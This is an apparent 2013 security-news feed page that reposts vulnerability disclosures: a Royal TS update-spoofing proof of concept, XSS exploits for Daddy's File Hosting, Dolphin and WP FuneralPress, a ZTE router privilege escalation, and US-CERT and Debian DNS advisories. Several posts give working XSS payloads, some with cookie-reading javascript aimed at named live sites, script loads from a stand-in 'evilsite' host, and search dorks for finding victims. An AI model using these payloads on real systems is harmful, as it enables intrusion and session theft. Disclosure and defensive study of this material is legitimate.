Vulnerable is version 2.1.5, other versions not tested.


###############################################################################
1. Update Spoofing Vulnerability
###############################################################################

Current version of Royal TS contains security vulnerability in update mechanism,
which can be exploited by malicious people to conduct spoofing attacks.

When checking for updates, Royal TS issues GET request over HTTP:

GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM HTTP/1.1
Cache-Control: no-cache
Host: www.royalts.com
Connection: Keep-Alive


Server response:

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT
Accept-Ranges: bytes
ETag: "d11e6057ebc3cd1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 28 Mar 2013 19:54:39 GMT
Content-Length: 13375

<?xml version="1.0" encoding="utf-8"?>
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";>
  <Major>2</Major>
  <Minor>1</Minor>
  <Build>5</Build>
  <MinorRevision>61116</MinorRevision>
  <DownloadURL>http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi</DownloadURL>
  <ReleaseNotes>
&lt;html lang=&quot;en&quot; xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;&lt; ...
  </ReleaseNotes>
</RoyalVersionInfo>



Royal TS user can click "Start Download" button and Royal TS
will open web browser with download starting dialog.

Such update mechanism contains security flaw:

Update check is done over unencrypted HTTP channel. Malicious third party
is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response.
In this way it is possible to instruct user to download malicious update.


Testing: tests were done using Windows 7 and Apache webserver. Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate
DNS spoofing:  127.0.0.1 www.royalts.com

2. create xml file "/dl/RoyalTS/VersionInfo.xml" to the webserver directory
with following content:

<?xml version="1.0" encoding="utf-8"?>
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";>
  <Major>2</Major>
  <Minor>3</Minor>
  <Build>4</Build>
  <MinorRevision>61116</MinorRevision>
  <DownloadURL>http://localhost/calc.exe</DownloadURL>
  <ReleaseNotes>
New version 2.3.4 available!
  </ReleaseNotes>
</RoyalVersionInfo>


3. Place "calc.exe" file to the webserver main directory.

4. Open Royal TS, it will check for updates automatically, resulting in dialog:

New version 2.3.4 available!


5. Press "Start Download" button. Default web browser window will be open
offering file download:

"You have chosen to open calc.exe"



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe () yahoo com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------




//The information contained within this publication is





//supplied "as-is"with no warranties or guarantees of fitness





//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts





//responsibility for any damage caused by the use or misuse of





//this information

BYOD and Increased Malware Threats Help Driving Billion Dollar Mobile Security Services Market in 2013, According to ABI Research

March 29, 2013, 10:26 am
$
0
0

LONDON--(BUSINESS WIRE)--Mobile malware has advanced to a new level of sophistication as smart devices continue to gain ground. The number of unique mobile threats grew by 261% in just two quarters. Increasingly complex malware is taking advantage of a wider range of mobile functionalities to exploit vulnerabilities on the device and in the network. Organizations allowing BYOD policies and without proper mobile device management capabilities are at great risk from covert interception and corruption.
“Isolated and standalone security solutions will work for the individual consumer, but for organizational applications and carriers, mobile security services will take the lead”
More than simple security applications, the demand for specialized services is driving the market for mobile security; network security, managed and professional services are set to become the biggest category for business-to-business mobile security. Bundled network security which includes unified threat management, deep packet inspections, virtual private networks, and remote device management will become increasingly important. The driving markets in mobile security are concentrating on services for mobile device, identity and authentication management, as well as for audits, certification, and consulting.
ABI Research estimates the current Mobile Security Services market to total $1.88 billion by the end of 2013, by far dominating both the Mobile Device and Mobile Application Security markets. “Isolated and standalone security solutions will work for the individual consumer, but for organizational applications and carriers, mobile security services will take the lead,” says Michela Menting, ABI Research’s senior analyst in cyber security.
The market will offer significant opportunities for vendors targeting mobile network operators as well as businesses. Vendors such as Adaptive Mobile and F-Secure are well-placed to consolidate their position for carrier-grade security solutions. Players offering highly-innovative solutions in niche markets include Aujas Networks (India) with professional services and Zimperium (Israel) for mobile IDS/UTM.
ABI Research provides in-depth analysis and quantitative forecasting of trends in global connectivity and other emerging technologies. From offices in North America, Europe and Asia, ABI Research’s worldwide team of experts advises thousands of decision makers through 70+ research and advisory services. Est. 1990. For more information visitwww.abiresearch.com, or call +1.516.624.2500.

Contacts

ABI Research
Christine Gallen, +44.203.326.0142
pr@abiresearch.com

Crossbow, a lightweight, cross-platform exploit development framework

March 29, 2013, 3:26 pm
$
0
0 

I'm proud to announce the open source release of a project I've been working on for a while called Crossbow.  Brought 
to you by Tactical Network Solutions, Crossbow is a framework built in Python whose purpose is to help make exploit 
development easier.  It currently targets MIPS Linux systems, but I hope to expand it to support other architectures in 
the future. 

Crossbow announcement:
http://shadow-file.blogspot.com/2013/03/crossbow.html

Multi-part tutorial (Three parts are up as of this message):
http://shadow-file.blogspot.com/2013/03/buffer-overflows-with-crossbow-part-1.html
http://shadow-file.blogspot.com/2013/03/buffer-overflows-with-crossbow-part-2.html
http://shadow-file.blogspot.com/2013/03/buffer-overflows-with-crossbow-part-3.html

Have a great weekend.

Zach Cutlip

Daddy's File Hosting XSS Vulnerability

March 29, 2013, 7:11 pm
$
0
0

##############################################
#_Author: Mr.0c3aN
#_Date: 3/29/2013
#_VULN/Exploit Name: Daddy's File Hosting - V2 __XSS Vuln
###############################################
__Main Info:
XSS Vuln found in Daddy's File Hosting - V2.
Simply just go to register page. All form is vulnerable to XSS.
Try: "><script>alert("Mr.0c3aN");</script>
URL: http://demo.daddyscripts.com/dfh/v2/index.php?page=register

100% Working&Usefull...
##############################################
#Respect...



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Search

US-CERT Alert TA13-088A: DNS Amplification Attacks

March 30, 2013, 4:09 am
$
0
0
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

National Cyber Awareness System
TA13-088A: DNS Amplification Attacks


Original release date: March 29, 2013

Systems Affected

 * Domain Name System (DNS) servers

Overview

A Domain Name Server (DNS) Amplification attack is a popular form of
Distributed Denial of Service (DDoS) that relies on the use of
publically accessible open recursive DNS servers to overwhelm a victim
system with DNS response traffic.

Description

A Domain Name Server (DNS) Amplification attack is a popular form of
Distributed Denial of Service (DDoS) that relies on the use of
publically accessible open recursive DNS servers to overwhelm a victim
system with DNS response traffic. The basic attack technique consists of
an attacker sending a DNS name lookup request to an open recursive DNS
server with the source address spoofed to be the victims address. When
the DNS server sends the DNS record response, it is sent instead to the
victim. Because the size of the response is typically considerably
larger than the request, the attacker is able to amplify the volume of
traffic directed at the victim. By leveraging a botnet to perform
additional spoofed DNS queries, an attacker can produce an overwhelming
amount of traffic with little effort. Additionally, because the
responses are legitimate data coming from valid servers, it is
especially difficult to block these types of attacks.

While the attacks are difficult to prevent, network operators can
implement several possible mitigation strategies. The primary element in
the attack that is the focus of an effective long-term solution is the
detection and elimination of open recursive DNS resolvers. These systems
are typically legitimate DNS servers that have been improperly
configured to respond to recursive queries on behalf of any system,
rather than restricting recursive responses only to requests from local
or authorized clients. By identifying these systems, an organization or
network operator can reduce the number of potential resources that the
attacker can employ in an attack.

Impact

A misconfigured Domain Name System (DNS) server can be exploited to
participate in a Distributed Denial of Service (DDoS) attack.

Solution

DETECTION

Several organizations offer free, web-based scanning tools that will
search a network for vulnerable open DNS resolvers. These tools will
scan entire network ranges and list the address of any identified open
resolvers.

Open DNS Resolver Project
http://openresolverproject.org
The Open DNS Resolver Project has compiled a list of DNS servers that
are known to serve as globally accessible open resolvers. The query
interface allows network administrators to enter IP ranges in CIDR
format [1].

The Measurement Factory
http://dns.measurement-factory.com
Like the Open DNS Resolver Project, the Measurement Factory maintains a
list of Internet accessible DNS servers and allows administrators to
search for open recursive resolvers [2]. In addition, the Measurement
Factory offers a free tool to directly test an individual DNS resolver
to determine if it allows open recursion. This will allow an
administrator to determine if configuration changes are necessary and
verify that configuration changes have been effective [3]. Finally, the
site offers statistics showing the number of open resolvers detected on
the various Autonomous System (AS) networks, sorted by the highest
number found [4].

DNSInspect
http://www.dnsinspect.com
Another freely available, web-based tool for testing DNS resolvers is
DNSInspect. This site is similar to The Measurement Factorys ability to
test a specific resolver for vulnerability, but offers the ability to
test an entire DNS Zone for several other potential configuration and
security issues [5].

Indicators

In a typical recursive DNS query, a client sends a query request to a
local DNS server requesting the resolution of a name or the reverse
resolution of an IP address. The DNS server performs the necessary
queries on behalf of the client and returns a response packet with the
requested information or an error [6, page 21]. The specification does
not allow for unsolicited responses. In a DNS amplification attack, the
key indicator is a query response without a matching request.

MITIGATION

Unfortunately, due to the overwhelming traffic volume that can be
produced by one of these attacks, there is often little that the victim
can do to counter a large-scale DNS amplification-based distributed
denial-of-service attack. While the only effective means of eliminating
this type of attack is to eliminate open recursive resolvers, this
requires a large-scale effort by numerous parties. According to the Open
DNS Resolver Project, of the 27 million known DNS resolvers on the
Internet, approximately 25 million pose a significant threat of being
used in an attack [1]. However, several possible techniques are
available to reduce the overall effectiveness of such attacks to the
Internet community as a whole. Where possible, configuration links have
been provided to assist administrators with making the recommended
changes. The configuration information has been limited to BIND9 and
Microsofts DNS Server, which are two widely deployed DNS servers. If you
are running a different DNS server, please see your vendors
documentation for configuration details.

Source IP Verification

Because the DNS queries being sent by the attacker-controlled clients
must have a source address spoofed to appear as the victims system, the
first step to reducing the effectiveness of DNS amplification is for
Internet Service Providers to deny any DNS traffic with spoofed
addresses. The Network Working Group of the Internet Engineering Task
Force released a Best Current Practice document in May 2000 that
describes how an Internet Service Provider can filter network traffic on
their network to drop packets with source addresses not reachable via
the actual packets path [7]. This configuration change would
considerably reduce the potential for most current types of DDoS
attacks.

Disabling Recursion on Authoritative Name Servers

Many of the DNS servers currently deployed on the Internet are
exclusively intended to provide name resolution for a single domain.
These systems do not need to support resolution of other domains on
behalf of a client, and therefore should be configured with recursion
disabled.

Bind9

Add the following to the global options [8]:
options {
 allow-query-cache { none; };
 recursion no;
};

Microsoft DNS Server

In the Microsoft DNS console tool [9]: * Right-click the DNS server and
click Properties.
 * Click the Advanced tab.
 * In Server options, select the Disable recursion check box, and then
click OK.

Limiting Recursion to Authorized Clients

For DNS servers that are deployed within an organization or ISP to
support name queries on behalf of a client, the resolver should be
configured to only allow queries on behalf of authorized clients. These
requests should typically only come from clients within the
organizations network address range.

BIND9

In the global options, add the following [10]:
acl corpnets { 192.168.1.0/24192.168.2.0/24; };
options {
 allow-query { corpnets; };
 allow-recursion { corpnets; };
};

Microsoft DNS Server

It is not currently possible to restrict recursive DNS requests to a
specific client address range in Microsoft DNS Server. The most
effective means of approximating this functionality is to configure the
internal DNS server to forward queries to an external DNS server and
restrict DNS traffic in the firewall to restrict port 53 UDP traffic to
the internal server and the external forwarder [11].

Rate Limiting Response of Recursive Name Servers

There is currently an experimental feature available as a set of patches
for BIND9 that allows an administrator to restrict the number of
responses per second being sent from the name server [12]. This is
intended to reduce the effectiveness of DNS amplification attacks by
reducing the volume of traffic coming from any single resolver.

BIND9

On BIND9 implementation running the RRL patches, add the following lines
to the options block of the authoritative views [13]:
rate-limit {
 responses-per-second 5;
 window 5;
};

Microsoft DNS Server

This option is currently not available for Microsoft DNS Server.

References

 * [1] Open DNS Resolver Project
 * [2] The Measurement Factory, "List Open Resolvers on Your Network"
 * [3] The Measurement Factory, "Open Resolver Test"
 * [4] The Measurement Factory, "Open Resolvers for Each Autonomous
System"
 * [5] "DNSInspect," DNSInspect.com
 * [6] RFC 1034: DOMAIN NAMES - CONCEPTS AND FACILITIES
 * [7] BCP 38: Network Ingress Filtering: Defeating Denial of Service
Attacks which employ IP Source Address Spoofing
 * [8] Chapter 3. Name Server Configuration
 * [9] Disable recursion on the DNS server
 * [10] Chapter 7. BIND 9 Security Considerations
 * [11] Configure a DNS Server to Use Forwarders
 * [12] DNS Response Rate Limiting (DNS RRL)
 * [13] Response Rate Limiting in the Domain Name System (DNS RRL)

Revision History

 * March 29, 2013: Initial release

Relevant URL(s):
<http://openresolverproject.org/>

<http://dns.measurement-factory.com/cgi-bin/openresolverquery.pl>

<http://dns.measurement-factory.com/cgi-bin/openresolvercheck.pl>

<http://dns.measurement-factory.com/surveys/openresolvers/ASN-reports/latest.html>

<http://www.dnsinspect.com/>

<http://tools.ietf.org/html/rfc1034>

<http://tools.ietf.org/html/bcp38>

<http://ftp.isc.org/isc/bind9/cur/9.9/doc/arm/Bv9ARM.ch03.html#id2567992>

<http://technet.microsoft.com/en-us/library/cc787602.aspx>

<http://ftp.isc.org/isc/bind9/cur/9.9/doc/arm/Bv9ARM.ch07.html#Access_Control_Lists>

<http://technet.microsoft.com/en-us/library/cc754941.aspx>

<http://ss.vix.su/~vixie/isc-tn-2012-1.txt>

<http://www.redbarn.org/dns/ratelimits>

____________________________________________________________________

   Produced by US-CERT, a government organization.
____________________________________________________________________

This product is provided subject to this Notification:
http://www.us-cert.gov/privacy/notification/

Privacy & Use policy:
http://www.us-cert.gov/privacy/

This document can also be found at
http://www.us-cert.gov/ncas/alerts/TA13-088A



-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iQEVAwUBUVXuq3dnhE8Qi3ZhAQIBXAf+LICtxQHGu5j7x8NAFG+tTSWrjducZ37v
oWhQuSsXp9XjwAN1RdXOZRpX2Sbp5b1bVZ+FfjdPljoRVpoRksuBu5qOfzathZEP
3aRA7O0Kffuk2ofCsn8I9nWOas7bZa9gO8hGan4ORjEJLt4OWFtPW+2aWfDKY72x
lcky1Ms6Z1TGkCTgJLuoUXXmGg8JQJqvRfkc7VAY4ttpJV1/DtpMIZyf2Hbr4inp
ClnGYi64ukzu38kYkQ33u3oPKjYX8bwWKAZRnpQAcHO8ddswKre7Cz2Ar5tTNluY
0/nzEAx6BVAKgntp5NUJ8y55ej+RyEQiCpBAkhE8xImmxAUPJ7AiMw==
=FVTl
-----END PGP SIGNATURE-----

[SECURITY] [DSA 2656-1] bind9 security update

March 30, 2013, 8:51 am
$
0
0
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2656-1                   security@debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
March 30, 2013                         http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : bind9
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-2266
Debian Bug     : 704174

Matthew Horsfall of Dyn, Inc. discovered that BIND, a DNS server, is
prone to a denial of service vulnerability. A remote attacker could use
this flaw to send a specially-crafted DNS query to named that, when
processed, would cause named to use an excessive amount of memory, or
possibly crash.

For the stable distribution (squeeze), this problem has been fixed in
version 1:9.7.3.dfsg-1~squeeze10.

For the testing distribution (wheezy), this problem has been fixed in
version 1:9.8.4.dfsg.P1-6+nmu1.

For the unstable distribution (sid), this problem has been fixed in
version 1:9.8.4.dfsg.P1-6+nmu1.

We recommend that you upgrade your bind9 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)

iQEcBAEBCgAGBQJRVwfuAAoJEG3bU/KmdcClTN8H/RFFGZtUqsNOL2f1h37luA37
ue0ijzAQewC+BSYn6sGTYItmiPDMU5Ok5m6LdYI5U5f/+47FBUcIQJv569zI5IKt
J7gKlsNXCAQfV0eYZu0FctfSMn23QoKBSBF7j5PTwW6RiP2PvcocRa/lvYmT2GIU
K6F5/Gmfk8VQRyCbsy26T7J3d3PuKIKYV2LGTUvKhIJKPhokrm5nESBTrE/0nmW7
9I/PSqK35nTiLyCBZinY0G3xl6UhrlQxxqHCryrFVZQVkOn8pUR06tulkJsx6rHW
k8GgPkPk5w0oPs5VEk9WfLLgFX+ukvGS+DWFZyIT7lMPvQ2ac8aGDjpm0bu6Ys8=
=7ACF
-----END PGP SIGNATURE-----

Dolphin v7.0 XSS Vulnerability

March 30, 2013, 9:32 am
$
0
0
# Title : Dolphin v7.0 Cross Site Scripting Vulnerability
# Date: 2013-03-15
# Software Link: http://www.codeweblog.com/source/dolphin/nav.html?plugins/swfupload/swf/swfupload.js.source.html
# Credit: This Bug was founded by Asesino04 "The Black Devils"
# Tested on: Windows XP SP2
# Category: [webapps]
# Dork : inurl:plugins/swfupload/swf/
# Special Thanks To : sH3LL05Dz & Lady NEXA & x3o-1337

# Please Like The New Fb page  : https://fb.com/Th3.Black.D3Vils
-----------


http://127.0.0.1/path/plugins/swfupload/swf/swfupload.swf?buttonText=[ XSS ]


# Demo :
http://www.gadgetcore.co.uk/CommunityCloud/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E
https://www.healthyride.com/c/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E
http://www.medicina312.kg/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E

-----------
Thanks To : | r0073r | KedAns-Dz | D4RKCR1PT3R | Keystr0ke | x3o-1337 | Èlite TrØjan | sH3LL05Dz
            | Ana Eve | DZ Combattant | Muhammad Talha Khan | r4dc0re | SeeMe CrosS | Zikou-16 | DaOne
            | Angel Injection | NuxbieCyber | Tibit | Sammy FORGIT | D4NB4R beBoss | LORDOFDARKNES
            | All Dz hackerz
-----------
 Contact:
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube  : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email    : mr.k4rizma@gmail.com




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


ZTE ZXDSL 831IIV7 Privilege Escalation

March 30, 2013, 9:32 am
$
0
0
# Title : ZTE ZXDSL 831IIV7 Privilege Escalation
# Date: 2013-03-15
# Credit: This Bug was founded by Asesino04 "The Black Devils"
# Tested on: Windows XP SP2
# Category: [webapps]
# Dork :use shodanhq [ dsl router ]
# Special Thanks To : sH3LL05Dz & Lady NEXA & x3o-1337

# Please Like The New Fb page  : https://fb.com/Th3.Black.D3Vils
-----------
Overview of Device Information
This information reflects the current status of your DSL Router.

ADSL Port       Enabled

Downstream Line Rate    11998
Upstream Line Rate      985
LAN IP Address  192.168.1.1
Default Gateway        
Primary DNS Server      192.168.1.1
Secondary DNS Server    192.168.1.1
Ethernet MAC Address    00:22:93:9c:66:a7
Firmware Version        ZXDSL 831IIV7.5.0a_Z29_OV



--------how to exploit ----------------------

http://192.168.1.1/
login as user
then goes to this link
http://192.168.1.1/accessaccount2.html
here you'll find thta here you only you can change the password of the user change the link to

http://192.168.1.1/accessaccount.html
here you'll find how to chnage the password of the administrator

-----------
Thanks To : | r0073r | KedAns-Dz | D4RKCR1PT3R | Keystr0ke | x3o-1337 | Èlite TrØjan | sH3LL05Dz
            | Ana Eve | DZ Combattant | Muhammad Talha Khan | r4dc0re | SeeMe CrosS | Zikou-16 | DaOne
            | Angel Injection | NuxbieCyber | Tibit | Sammy FORGIT | D4NB4R beBoss | LORDOFDARKNES
            | All Dz hackerz
-----------
 Contact:
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube  : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email    : mr.k4rizma@gmail.com





//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

WP FuneralPress - Stored XSS in Guestbook

March 31, 2013, 5:24 am
$
0
0

#
#
# WP FuneralPress - stored xss in guestbook
#
# "FuneralPress is an online website obituary management and guest book
program for funeral homes and cemeteries"
# http://wpfuneralpress.com/
#
# tested on: funeralpress version 1.1.6 / wordpress version 3.5.1
#
# impact:
#   malicious script execution as wordpress administrator
#
# author: robarmstrong.te71 () gmail com


# summary

A low-privilege or guest user can inject code via the
<textareaname="photo-message">, <
textarea name="youtube-message"> and <textarea name="message"> elements
which are part of the wpfh_upload_form form in
http://site/obituaries/?id=[ID]&f=guestbook&m=add

Scripts injected via the "photo-message" and "youtube-message" elements
will be executed by the admin user when they browse to the guestbook admin
page at http://site/wp-admin/admin.php?page=wpfh-guestbook

If a malicious post is approved by the admin, the script will be run by
anyone viewing the guestbook.



# details

There appears to be some basic xss protection on form submissions using <
textarea name="message"> and code injected via this element is not served
up on the guestbook admin page.

Despite this, scripts injected via an iframe or embedded svg will be
executed by anyone viewing the guestbook at http://site/obituaries/?id=1&f=
guestbook on the condition that the post is approved by the site
administrator. The chances of an administrator approving a malicious
message are increased if some normal-looking text is inserted above the
malicious code, resulting in a legitimate looking "Message Preview" field
on the admin page.

## message post example:

    1. Attacker browses to:
http://site/obituaries/?id=1&f=guestbook&m=addand submits the form
with the following entered into <
textarea name="message" style="width:98%;height:170px" id="wpfh_message_
textarea"></textarea> :

        Poor Peter was a fine old chap, such a pity he was eaten to death
by a pack of wild children.

        <IFRAME SRC="javascript:document.write('xss cookie: ' +
document.cookie);"></IFRAME>

        <EMBED SRC="data:image/svg+xml
;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZW
NtYXNjcmlwdCI+YWxlcnQoInhzcyBhbGVydCIpPC9zY3JpcHQ+PC9zdmc+Cg==" type="image/
svg+xml" AllowScriptAccess="always"></EMBED>

    2. Site administrator browses to http://site/wp-admin/admin.php?page=
wpfh-guestbook, sees an entry with a message preview that reads "Poor Peter
was a fine old chap..." and approves it.

    3. Anyone browsing to http://site/obituaries/?id=1+&f=guestbook will
execute the injected script



The xss flaws in <textarea name="photo-message"> and <textarea
name="youtube-message">
are more serious, as scripts injected here are served up to the admin user
when they attempt to approve the guestbook comments at http://site/wp
-admin/admin.php?page=wpfh-guestbook

As with the regular guestbook messages, if the admin approves a malicious
photo or youtube message the script will be executed by anyone browsing to
the guestbook.

## photo/youtube post example:

    1. Attacker hosts malicious javascript on another site:

        http://evilsite/fp.js :
            document.getElementById("topmenu").innerHTML="<h1>XSS</h1>";
//rewrite admin page

        http://evilsite/doc.js :
            document.write("document.write XSS");alert("XSS");

    2. Attacker browses to:
http://site/obituaries/?id=1&f=guestbook&m=addand selects either the
"Photo" or "
Youtube" guestbook message option

    3. If Photo was selected, the attacker enters a path to a local image
in <input type="file" name="photo" id="wpfh_message_file">. Otherwise they
enter a Youtube link into <input type="text" name="youtube"
style="width:95%" id="wpfh_message_youtube" value="">

    4. Depending on which type of message was selected, the attacker
submits the form with the following entered into
<textareastyle="width:100%;height:70px" name="photo-message"></
textarea> or <textarea style="width:100%;height:70px" name="youtube
-message"></textarea> :

        <SCRIPT SRC=http://evilsite/fp.js></SCRIPT>
        <SCRIPT SRC=http://evilsite/doc.js></SCRIPT>

    5. The site administrator browses to http://site/wp-admin/admin.php
?page=wpfh-guestbook and the scripts that have been injected into <table
class="wp-list-table widefat fixed posts" cellspacing="0"> are executed:

        <td  style="background-color:#ffd1d1 !important" >
            <a href="http://www.youtube.com/watch?v=tsLkL8DTHeg";
target="_blank">View Video</a><br><SCRIPT SRC=http://evilsite/fp.js
</SCRIPT>
            <SCRIPT SRC=http://evilsite/doc.js></SCRIPT>
        </td>




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Viewing all 8064 articles
Browse latest View live
Search